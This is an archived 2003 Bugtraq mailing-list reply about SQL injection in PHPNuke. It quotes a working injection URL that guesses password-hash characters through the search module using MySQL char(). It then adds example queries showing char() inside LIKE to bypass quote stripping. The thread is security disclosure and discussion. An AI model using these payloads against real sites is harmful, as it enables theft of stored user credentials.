Bugtraq mailing list archives
Re: PHPNuke SQL Injection
From: Martin Eiszner <martin () websec org>
Date: Fri, 21 Feb 2003 08:11:18 +0100
hola, On 20 Feb 2003 20:36:11 -0000 Lucas Armstrong <lucas () cgishield com> wrote:
To get around this problem, one could use the mysql char() function which will output any ascii value, without using quotes. So to guess the letter 'a' the hacker could use char(97). Here is an example url guessing the 3rd character in the pwd column as 'a': http://site/modules.php? name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,3,1)=char (97)&type=stories
JFYI: this maybe off topic but it worth mentioning .. a couple of month ago we found out that the mysql char() function can be used within the "like() - function" to place quotes. this may help somebody doing sql-injection in an "quote-stripped :-)" environment. example query: ---*--- select id,Name,password from Users where id = 1 and (user() like "%root%"); ---*--- and now "without" quotes: ---*--- select id,Name,password from Users where id = 1 and (user() like char(37,114,111,111,116,37)); ---*--- ... nice day, mEi -- WebSec.org / Martin Eiszner Gurkgasse 49/Top14 1140 Vienna Austria / EUROPE mei () websec org http://www.websec.org tel: 0043 699 121772 37
Current thread:
- PHPNuke SQL Injection Lucas Armstrong (Feb 20)
- Re: PHPNuke SQL Injection Martin Eiszner (Feb 21)
- Re: PHPNuke SQL Injection / General SQL Injection David Walker (Feb 21)
- Re: PHPNuke SQL Injection / General SQL Injection MightyE (Feb 23)
- <Possible follow-ups>
- RE: PHPNuke SQL Injection Oriol Carreas (Feb 21)